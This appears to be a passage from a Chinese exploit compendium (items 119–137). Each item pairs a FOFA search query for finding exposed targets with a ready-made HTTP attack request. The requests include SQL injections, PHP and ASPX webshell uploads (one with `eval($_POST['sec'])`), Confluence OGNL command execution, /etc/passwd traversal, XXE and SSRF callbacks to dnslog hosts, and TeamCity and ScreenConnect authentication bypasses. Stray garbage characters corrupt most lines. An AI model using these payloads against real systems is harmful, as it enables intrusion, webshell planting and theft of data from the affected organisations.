5 v" C6 y6 a( L' }' pHost: x.x.x.x+ i' v7 s' s: T$ w5 A7 A" R" O7 y- v- v* L
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee  o7 Z' \7 s1 ]" F  k) q/ S  h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 h" I/ r4 K: ^) _Accept: */*
+ F% j6 g  k" o9 r/ n  LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 R" {* \7 E' E
Accept-Encoding: gzip, deflate
) h1 y* A2 x$ x+ Q/ H* YContent-Type: application/x-www-form-urlencoded;5 J6 q- \" u4 _# a) x! X
Content-Length: 109
+ k6 U# s& g: {Origin: https://58.18.133.60:8443
' Z8 n0 l7 h6 O8 s5 X8 ^) ^  [1 hReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
3 b8 U6 z+ h+ S9 H1 v' USec-Fetch-Dest: empty
5 }* F" Q/ b/ iSec-Fetch-Mode: cors% N1 R. G  l# ^, ]! L& S
Sec-Fetch-Site: same-origin
  _* _6 f- m# W& {X-Forwarded-For: 1.1.1.1* f* I+ O+ x, ^% z+ [7 C% t) u8 ?
X-Originating-Ip: 1.1.1.1
2 m( u3 N  f* rX-Remote-Ip: 1.1.1.1
6 J1 \0 V: w& \6 J, J, [; ZX-Remote-Addr: 1.1.1.1) F, B8 I" l2 ^5 \
Te: trailers
2 z( A( j7 M; L3 EConnection: close$ H# ]8 e% f8 {7 d. c% \
3 F$ Q0 q& T- I! ~7 g" E  M1 ]
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234566 i: E- ?# q" {+ B: M

7 R2 j/ d+ v, o% x) L; W% `# D4 _- E* P% n2 R! }+ Q
120. 北京百绰智能S40管理平台导入web.php任意文件上传
+ N" A$ O8 |9 t' _& t) i# I: p, ]CVE-2024-1253, c8 a2 C/ o6 L$ b. B, ~
FOFA:title="Smart管理平台"
- }' m2 @) T+ h6 ^POST /useratte/web.php? HTTP/1.19 I$ o& ]9 K5 Q+ A- J$ t6 t6 R/ I* [
Host: ip:port$ N* L) E9 t& U$ u
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db$ o5 d0 Y3 H4 }
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
0 l3 v/ r0 W! {$ y4 y; SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# w/ x/ g0 {6 R. Q2 x8 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 S9 a0 G% ?4 v5 Z6 s- H
Accept-Encoding: gzip, deflate$ f0 p0 E4 x& l2 P$ U- b& t& u
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( Z* h2 C  @. @# _' F5 j
Content-Length: 597: t7 u8 `9 B" A; Z) ]
Origin: https://ip:port7 O+ G4 m8 ?( g- i: @; c( Y
Referer: https://ip:port/sysmanage/licence.php- e- C2 l0 q3 v! Z0 X% o
Upgrade-Insecure-Requests: 1- M% W$ t$ F2 d" p
Sec-Fetch-Dest: document6 L! c5 o1 K. l# u- H- j
Sec-Fetch-Mode: navigate- y( y* w0 f' h3 F6 y* Z) G9 `( u
Sec-Fetch-Site: same-origin1 s; l: d5 U) V) n6 r% ]
Sec-Fetch-User: ?1
0 \7 B! y" h; Q; P* b$ I. Y+ u, mTe: trailers
0 s5 Y; W3 O% m0 w/ m% r4 UConnection: close
# m! I; B" R+ R, N: b! M( p& e; M4 k$ }% q6 K9 p' V, `& K
-----------------------------42328904123665875270630079328
3 A# x6 ^. }2 O4 W! |% u) y/ l) B( WContent-Disposition: form-data; name="file_upload"; filename="2.php"
- h& T  o* ~* Y/ w, z1 {2 jContent-Type: application/octet-stream
& |2 Y9 x, i: ^% Z; j
& z5 g9 p, {* `7 R" P: N2 m3 a( h<?php phpinfo()?>& o+ \& v* o3 Y$ `/ @1 ^
-----------------------------42328904123665875270630079328
  b0 \; k1 @& y6 U& d! RContent-Disposition: form-data; name="id_type"% V4 v! s2 R, {1 |2 X* e4 D- }6 A
0 _, D$ S+ b( B9 o2 Y
1/ ^  F7 r  r8 j" p* M- t; |* a
-----------------------------42328904123665875270630079328* _- L* a/ N$ Q4 o; I# U
Content-Disposition: form-data; name="1_ck"
4 }" I' e  S' B% w# t' }8 c- ^  a
1 n/ E5 g1 D. S1_radhttp
& d1 D) b/ h: H6 h  r7 a-----------------------------42328904123665875270630079328
, Q% I; o8 {; r! C, z9 jContent-Disposition: form-data; name="mode"$ V2 r( V3 S! ?) V

$ D5 f+ A2 ]3 F5 v6 t% uimport1 Z# J* W: m/ S& }' U1 Z6 `
-----------------------------42328904123665875270630079328
9 g, R8 I: w  N
$ {% K- n1 A5 b
  y  N  p& m6 w* K# K! X文件路径/upload/2.php* ~4 e$ N# l/ F9 \9 Y- k3 o% p
! G% X- n; C1 D9 i( E: w% R
121. 北京百绰智能S42管理平台userattestation.php任意文件上传0 i; A$ h% c6 t7 e4 ]
CVE-2024-19187 d$ a: |+ n2 L6 O. S9 w
FOFA:title="Smart管理平台"' x  \! S/ {& N% c' R6 K3 {4 I
POST /useratte/userattestation.php HTTP/1.12 n. H0 P' ^) [4 s0 e$ {
Host: 192.168.40.130:8443
5 c6 w( L( k* ~6 o1 m  \Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50: j( V6 g, s2 Q$ a& c9 L8 p
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
" [; `) ]; }4 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) ?$ s  F7 c5 N6 |) n# ]7 K# {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ B/ S9 R- T* ]% n
Accept-Encoding: gzip, deflate
8 y. ^) O! Z0 O- n4 U: i* N: {- {Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' [  ]& S  b: IContent-Length: 592
% |  z2 {& ^2 u+ i4 TOrigin: https://192.168.40.130:8443
% N5 k9 c9 G: P9 a  }0 [Upgrade-Insecure-Requests: 1
' D( }7 I) b8 n( ^% gSec-Fetch-Dest: document2 r+ l  m: r1 W. J* p' T+ N1 A
Sec-Fetch-Mode: navigate+ g% H- D! w. J  N
Sec-Fetch-Site: same-origin# ]4 {: A& T% {5 g; X
Sec-Fetch-User: ?1- n) {, A6 K) h  p
Te: trailers2 C5 M" a: g8 N+ l+ m! b
Connection: close) Q- P  ^: |2 ~
0 e  k# [6 C2 f1 n2 C! ~
-----------------------------42328904123665875270630079328
- @" C; u$ W# Q, i  W8 RContent-Disposition: form-data; name="web_img"; filename="1.php"
2 o  H9 _5 n# u2 t% c  UContent-Type: application/octet-stream5 K4 Y4 k2 y3 f2 D) \: z, a* a+ ]
, g# x" d# Y8 i5 y" C
<?php phpinfo();?>
% c2 z$ c  ~8 f1 i+ y: v-----------------------------42328904123665875270630079328
: Q) j  a# U* @$ ^; O  t5 fContent-Disposition: form-data; name="id_type"
' @, R8 S0 O. |$ v+ ]) F3 l( Z% Z& m" L/ `* }5 s
1
2 g7 u9 j! w: b, K$ v/ D* \0 _-----------------------------42328904123665875270630079328% [: \4 Z. J4 l9 d
Content-Disposition: form-data; name="1_ck"
1 _: s* }2 O# q% I8 k
) S: K2 i$ F: f; x* j1 |; i- }# {1_radhttp+ i, ^# o5 Y0 J0 W0 L7 [
-----------------------------42328904123665875270630079328
; _9 \) n- V' b; L5 K& }- K- X% yContent-Disposition: form-data; name="hidwel"
/ U8 Z6 e  f$ h5 w# M8 J+ e4 |, }
0 ?+ M  R* l6 A: ~$ Q. kset& \: w2 P, t; v4 Y
-----------------------------423289041236658752706300793282 f% o' p9 r1 T' ~- F  U
6 X% v7 t; Y6 c/ `- v

& G2 z& d9 T; F* i8 g' Hboot/web/upload/weblogo/1.php2 {% U: {  _& M" C& \+ L/ X* j
  c, O- H7 k" e/ t0 k- N
122. 北京百绰智能s200管理平台/importexport.php sql注入7 u; v7 E$ ~. E4 N
CVE-2024-27718FOFA:title="Smart管理平台"
, B9 |. b6 I# k# o! v其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version(); w! N  u" e4 o
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
6 m  X, Y% n* G) LHost: x.x.x.x
/ G. ^; P) j2 S! E2 Q6 ]Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0# a$ S8 K% p% ^+ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
. |' e/ I2 l1 ]/ jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ ~# C) p' H( g- H9 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 Y4 H( D, t, u! t& Z4 E( J
Accept-Encoding: gzip, deflate, br$ H- L5 L0 B; T) t7 M" C
Upgrade-Insecure-Requests: 1
- U9 C) h, c( F. n" NSec-Fetch-Dest: document7 M/ f+ h. c  P8 ~/ B% `1 |, S
Sec-Fetch-Mode: navigate( c6 ]% i* w0 C: }
Sec-Fetch-Site: none
# U. z' Q; p3 E& r" y/ y9 oSec-Fetch-User: ?16 D; I& T3 x: \0 O* P
Te: trailers8 x* L" L  G& P: ^
Connection: close
" Z9 E# k  u: Z  j9 A6 o( h, F# F4 Y' f  h5 _( s

! v6 y7 r9 y0 G6 L5 B/ q8 ~( O; d* X123. Atlassian Confluence 模板注入代码执行% ]; o" l/ k7 ~$ ]1 t0 f+ @
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"! E/ m0 L7 K. @
POST /template/aui/text-inline.vm HTTP/1.1
/ H7 `4 G# ~; tHost: localhost:8090
+ _4 O% W& r3 L" D+ T7 ]Accept-Encoding: gzip, deflate, br
$ R6 d% {; W. Y& v# V1 OAccept: */*+ ~" X% w% l: C
Accept-Language: en-US;q=0.9,en;q=0.8
" A' A/ L9 o, I! B1 |; fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
# h' @0 x! C* W! O& W! m& F# |Connection: close
% U1 @# E+ {" b. K1 L8 _% x, c( j3 i7 {Content-Type: application/x-www-form-urlencoded
  F2 x7 @5 H+ o7 G$ j  B4 R9 Q. }# j) f1 L& T- I
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
0 S% s, E0 c0 Q) Z4 _
, ~! o! u' Y, M5 a* L6 s. J
7 ^5 G# _8 @$ r+ d- s8 b124. 湖南建研工程质量检测系统任意文件上传; J7 _: K' ?% @1 [2 j8 A( {
FOFA:body="/Content/Theme/Standard/webSite/login.css". B3 \- o1 s1 \7 f- r
POST /Scripts/admintool?type=updatefile HTTP/1.1
5 z# f, ?: _2 ?$ e$ {! O7 d/ I) U& _Host: 192.168.40.130:82826 o3 ~5 Q4 s' X% \  h, f/ h
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 }% @9 _5 G( c( }/ P6 O& k
Content-Length: 72
% a! R) j$ r5 ]& W! @% v4 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8; |1 D$ {8 h! C  K  ?& c' o
Accept-Encoding: gzip, deflate, br! X, z$ o* |; T) V$ i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 [' z2 k( _, X0 h) B8 ~" X
Connection: close5 p, Z) y+ t& ^+ a( ~
Content-Type: application/x-www-form-urlencoded
/ r6 W) L2 s1 B/ b; u0 `# b2 E  z
3 y3 f4 K, g3 D" q! bfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>5 e3 V& [5 \  P. V

2 t  ]: C+ o$ ~( @$ U% A- a
/ F( b, \# K0 R2 u* ]5 Ahttp://192.168.40.130:8282/Scripts/abcgcg.aspx
1 V& S9 h# J* L/ X: X! H5 I9 n. E: ?3 H5 l# s8 }& T$ j
125. ConnectWise ScreenConnect身份验证绕过
% @4 {' o) k6 ?  M* tCVE-2024-1709
: V: o! K9 S% [/ Z& M1 w% qFOFA:icon_hash="-82958153"5 Q2 t& o: R( a
https://github.com/watchtowrlabs ... bypass-add-user-poc2 I7 E# m1 r3 S

' y) L/ w& L+ [: r, W
. x( I& H8 T; Y& B3 w使用方法
" B+ Z) A5 z7 O0 U8 epython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
& M. z+ h- _2 \, H( R! @
$ s0 @% w4 g* V2 s! N) [4 f
1 |, N2 z- I! \9 b$ J5 o! K- _创建好用户后直接登录后台,可以执行系统命令。
* _, {$ K* K+ P6 `. V: U% W8 j3 B  n* G7 w
126. Aiohttp 路径遍历
# r+ h1 w& [$ v2 j. RFOFA:title=="ComfyUI"9 {. C( K8 J' L
GET /static/../../../../../etc/passwd HTTP/1.1. E3 G: W7 H  Q7 I' |
Host: x.x.x.x
: m+ ^+ s( ?0 Z8 m2 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36/ @6 K% ?" q3 n( |6 x% x
Connection: close- p4 e# H1 m# f* D( o& x- F* x
Accept: */*8 r  _) _0 W2 `8 u: _+ O! n
Accept-Language: en$ q4 [7 D" g4 I
Accept-Encoding: gzip4 Y( Q: i; j, Z3 [) X" x

7 N: F: \) _4 _1 k
6 R& A( e& a+ G127. 广联达Linkworks DataExchange.ashx XXE
: S) A0 `0 ^6 `, ~( ?FOFA:body="Services/Identification/login.ashx"   o  h3 k" m- y! i# i5 S. O: ?) k
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
+ Z2 N) J0 E; [: g6 [  F( KHost: 192.168.40.130:8888. \( X6 H9 ?7 _7 y  x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 a! h6 i/ o5 X" _; N. c
Content-Length: 415  Q# Y$ R' G6 A( I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, c  N& q3 ^9 y; g6 H5 \' X6 L
Accept-Encoding: gzip, deflate* C0 B% `( L) n# k; s5 C. E
Accept-Language: zh-CN,zh;q=0.9
( ^3 l) k. q8 }) D) E3 G  B8 |Connection: close
, h  X! }- i% V0 J" k, p: \* LContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0) P  @5 P7 p4 E
Purpose: prefetch
. B: n! q- B2 j( H  c! u  f4 zSec-Purpose: prefetch;prerender
, w: c' |  p# D& c0 V; W$ H) E9 b2 @# ]$ I9 p: H( h
------WebKitFormBoundaryJGgV5l5ta05yAIe0% d4 H3 U# A, z9 g& c
Content-Disposition: form-data;name="SystemName", E' K7 o6 t  X4 x+ V# Z

. d3 M4 [0 z! K# p5 v8 bBIM: c, C# q9 u( X: n* y) Z' ~
------WebKitFormBoundaryJGgV5l5ta05yAIe0" v& g, T4 Y5 Y( m
Content-Disposition: form-data;name="Params"$ ?+ T" {' y8 u* B2 O5 ?4 r! m
Content-Type: text/plain* F" L  M! t* m2 U
3 K- l7 v" g& ^8 c  Q/ A
<?xml version="1.0" encoding="UTF-8"?># c7 M& ~/ t7 A# @
<!DOCTYPE test [
) G) m: `: |" X; k: c8 L1 M0 `& j<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">( k) h; e$ E& R9 `! |
]. i0 n6 ?6 U) D, c. }
>  `/ M: c% y) X: k
<test>&t;</test>
/ u) H6 }. R  T! F0 U3 C" u& S------WebKitFormBoundaryJGgV5l5ta05yAIe0--+ T1 L4 v0 V& Q2 |& _4 w) ^

2 ~- V) P6 T6 s# I1 x
1 b5 @/ L* q( M
1 _2 z3 p2 j/ [8 C" l. Z128. Adobe ColdFusion 反序列化$ s2 ~, x' O. f  F# d: t+ F  r
CVE-2023-38203
- L( G: g& p( |. uAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
' }* G$ v- ]2 }FOFA:app="Adobe-ColdFusion"
+ M" ]6 ?3 \$ a# GPAYLOAD3 K* y, l% {( M6 V
% @) M1 o+ n# e" G, y
129. Adobe ColdFusion 任意文件读取
8 j) a2 x7 a" l8 gCVE-2024-207675 l8 T" {9 r: m! u2 }% `+ X3 u
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"" R# I1 b; R5 O. u: V! O
第一步,获取uuid4 O0 L: t2 ^$ D$ O& {% X  F( i
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1$ K7 J6 E& O8 v4 E# l1 ?+ G( ^
Host: x.x.x.x
* ]5 @2 q7 l2 `! X, D8 J4 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ i! u  w/ a% i% E
Accept: */*
6 h3 [, K: L/ r% a& mAccept-Encoding: gzip, deflate* g/ S/ w. J! D7 C4 I
Connection: close. g3 h1 N& V9 `' L
% b5 m( o4 v2 A4 G2 f& n

  E& `+ }- u, s. N) r第二步,读取/etc/passwd文件  n( l2 `3 I& |) B" O8 r
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
) n0 ~  z0 Q3 Z2 K8 dHost: x.x.x.x
1 X+ b# w% Z' B# l- X+ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.369 f5 C5 N1 {/ c8 z& a9 }
Accept: */*
4 p, v: p; ]" Q: V. h$ P. e0 _7 [  |Accept-Encoding: gzip, deflate2 x; `( M( Y4 C" b. v& a0 F; w
Connection: close( q; e7 H. L* Y5 _4 q
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
! d4 H' D7 g; M8 \) W# M
5 I# r; b. \8 v3 i3 E" Q" ]. M3 H5 l' x# ^* a# C
130. Laykefu客服系统任意文件上传3 |% g3 }% O5 m' u- ~
FOFA:icon_hash="-334624619"- z( q" v6 i8 h9 J( ]0 C$ P7 B- k
POST /admin/users/upavatar.html HTTP/1.1
9 r) _. n" D8 s- J* F( d) i! QHost: 127.0.0.13 [4 c4 K7 f7 Y$ N" }# g
Accept: application/json, text/javascript, */*; q=0.01* Q' i0 l7 k; {, k4 k" {8 g8 n
X-Requested-With: XMLHttpRequest* R6 i" z- A; U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" t( e0 ?- ]; f# P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR3 l( |- u! b9 s* N" N/ Y
Accept-Encoding: gzip, deflate
2 n% ?& W" v5 a1 m7 DAccept-Language: zh-CN,zh;q=0.9  q7 u, m8 k% T3 J
Cookie: user_name=1; user_id=3. t: `$ {. F& u; C5 D# c/ s
Connection: close
: B. a1 C, ~% p, O( h3 Q6 U
+ D  q0 C1 T" E------WebKitFormBoundary3OCVBiwBVsNuB2kR- j4 v! N  K( @- W/ w+ }
Content-Disposition: form-data; name="file"; filename="1.php"( u* S# W9 @( N% T2 h
Content-Type: image/png
1 n* k1 q* g$ O! }; k
6 E8 O: F6 `9 f) ~/ @! \' y<?php phpinfo();@eval($_POST['sec']);?>6 X% r* G8 V6 O; F8 h" _# C3 B# G% A
------WebKitFormBoundary3OCVBiwBVsNuB2kR--0 P" g+ S% X0 w1 f3 q
; t& ?. U. J$ o& c3 f
: ~( [9 Y4 Q7 H1 u' R
131. Mini-Tmall <=20231017 SQL注入
. }  y' s( C. K  B8 B0 j) p' p) VFOFA:icon_hash="-2087517259"6 i. ^+ ]" w) o' T  _- k
后台地址:http://localhost:8080/tmall/admin* i+ g" H& M8 S
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
- p3 d  q/ R2 [" s0 d2 I4 [% V1 @4 @
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过4 @6 Q9 ^2 {! b! r( {
CVE-2024-271980 ~& A/ k4 i7 r. b; r! C3 T. H
FOFA:body="Log in to TeamCity"
' @, M- s9 g8 k" |8 sPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
6 h5 u' m+ V. P% ?$ fHost: 192.168.40.130:81112 M$ ?6 v' U8 O8 J) Q! W3 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' ~: ]" P! w; Y" r, A9 ~; cAccept: */*0 H: T7 Y  g+ d3 l
Content-Type: application/json
" k3 ]0 X" `! V, e( o4 m8 Q) oAccept-Encoding: gzip, deflate
7 t; x! h" J1 c2 f& b4 M
* X# r7 M! Z6 j+ {{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}; E' U  c1 N0 g" d

8 g/ c' {: y% i+ Y
. k& m6 l# m6 ~2 [CVE-2024-27199
1 p8 [2 I+ O4 o1 j2 @" }/res/../admin/diagnostic.jsp
  }& f1 x, Z5 N( v6 ]/.well-known/acme-challenge/../../admin/diagnostic.jsp
/ _  M, m# S2 S* `6 P( _/update/../admin/diagnostic.jsp) o: j# i+ b" _7 t9 h& l

$ S# _$ {1 u- h. o% [: S/ V
7 `2 d. V; s' ~0 wCVE-2024-27198-RCE.py
6 d' N  ]! ~$ o# p* @
) [5 S, U$ k0 ~- X133. H5 云商城 file.php 文件上传8 X- @; ]4 {' y. g1 }! E5 H
FOFA:body="/public/qbsp.php". J' C# `, W- g  ~- A' o& t4 l
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1$ v) \0 q0 a- Z' ~$ v1 A
Host: your-ip6 e# b* c2 ~7 t) Z5 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
7 `+ s- u/ A6 u8 g: O  K- wContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx6 `7 v" T7 W/ P' s! E7 t

4 |2 J" b8 e1 J- W. {------WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 J/ G  E/ Y8 Q: M* i: W5 X; TContent-Disposition: form-data; name="file"; filename="rce.php"
3 k  @" G- S" q3 wContent-Type: application/octet-stream
( o  K0 L9 x$ j6 L8 A$ l- Q
; e1 z) J5 Y2 V: u% T2 Q<?php system("cat /etc/passwd");unlink(__FILE__);?>) a7 n6 f1 Z" n8 L6 L2 O# B7 h
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--3 ?* Y: D8 m; n# M6 K" N& l

) G/ |: w* s& s' h( O3 W" `4 O3 G: i" D. [9 j, R

0 H( F0 F$ E& q# ?) `( Q134. 网康NS-ASG应用安全网关index.php sql注入- _$ l* g+ R% R* v/ H$ f7 V
CVE-2024-2330
- u7 T* J1 t# fNetentsec NS-ASG Application Security Gateway 6.3版本& B4 e: s& l! b3 M! H
FOFA:app="网康科技-NS-ASG安全网关"
6 O, Q9 H7 {* i4 z: fPOST /protocol/index.php HTTP/1.1; Q" D- |+ h: Q  r8 Q+ @! ~
Host: x.x.x.x
9 z( N# U3 n  b: t( k9 VCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de! y$ X1 [& J& \0 f( b2 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
8 }. g+ y) H! e, wAccept: */*
! Y/ Y) K2 t) m& R5 F' _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. E0 P5 Q% Y1 ~- t: L: [* X* VAccept-Encoding: gzip, deflate- Z/ ?' x: i: q7 L$ g
Sec-Fetch-Dest: empty
& [: R: L1 L8 G+ s* B, G" h: OSec-Fetch-Mode: cors9 ~" s. x- j0 |+ G
Sec-Fetch-Site: same-origin( |! s0 F* c7 W8 O# f
Te: trailers( }" k3 B, k( v" ^0 K( Q/ R
Connection: close
; T' G: D3 y- p( cContent-Type: application/x-www-form-urlencoded% p4 @& `$ H7 p0 X* B' T8 @
Content-Length: 263
2 e  j, g2 C/ Q" o; Z7 O( U- \6 A
( U3 C) I# Z4 A2 k* l# c+ |jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}9 S* `9 V0 V1 P8 w$ N/ F! }" N

2 H9 g! K9 h: l3 A( o' e- R/ Z
5 K0 w, Q# g* e/ J, ^: N135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入8 C, r* D# M) f1 m2 F
CVE-2024-2022$ R1 i; z2 {* S8 k9 q
Netentsec NS-ASG Application Security Gateway 6.3版本; S* t. h* G8 S0 v; X
FOFA:app="网康科技-NS-ASG安全网关"$ A. W! Y# l/ P5 z$ F
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1$ F$ U3 O3 Y" Q
Host: x.x.x.x
  y. @% @# c( t& c( |$ Y+ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 o, v8 a) ^' }. t  R7 i% C& \, r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# u7 f% \' h: u' F9 a
Accept-Encoding: gzip, deflate
- H) a* A$ {$ N% EAccept-Language: zh-CN,zh;q=0.92 t+ T; k* q+ ]7 @8 _& b: X6 Y
Connection: close
, I, ~& f6 a, |+ l$ m2 j- {! m% I$ r8 J2 ]8 M) H9 a: \5 t

2 l) q, C* W: h! [, p: J136. NextChat cors SSRF
3 k' Q$ X5 B' q$ V" DCVE-2023-49785, I5 f' C% h8 X* U+ N) y3 ^
FOFA:title="NextChat"5 c4 H% f- G: s7 l0 i4 h
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
. O1 M. G) t8 \! _4 OHost: x.x.x.x:10000" Z6 f% E/ O' W$ T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 f+ s. u8 t4 ]2 ]% a' v
Connection: close
: F: K; K0 U  v9 |! b3 WAccept: */*
4 k8 m! \& a$ c* ?3 @8 |' V$ jAccept-Language: en0 i. ^3 _" a5 F1 v
Accept-Encoding: gzip
2 g: A% F5 f1 `4 n, Q* I( K! T
- m2 Q- I8 M. Z( c  J' F$ a
3 |- H: p/ p1 U& O# E137. 福建科立迅通信指挥调度平台down_file.php sql注入1 K, V# G& b2 T3 _5 F7 W
CVE-2024-26209 `/ m; w* `; Z- F; u
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 J+ }/ G! n8 L: y1 h
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.12 `4 W- K9 Q9 c' r
Host: x.x.x.x' e, N9 k9 b  ?+ g) Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ }. d9 l& p. g/ {! B) |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% x& _, p5 b* C" y5 `" B" v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ F; [9 [* H+ h( ~' r. ~
Accept-Encoding: gzip, deflate, br/ j% y+ w3 L0 p- I/ @' w( U# o
Connection: close
% W5 K; E7 H& k5 D  F) {Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
7 n4 E: K  T4 Q1 \. {6 EUpgrade-Insecure-Requests: 1" r% z) Y( I) B, E: o% q' X+ [" p
+ b8 D* W  h- `

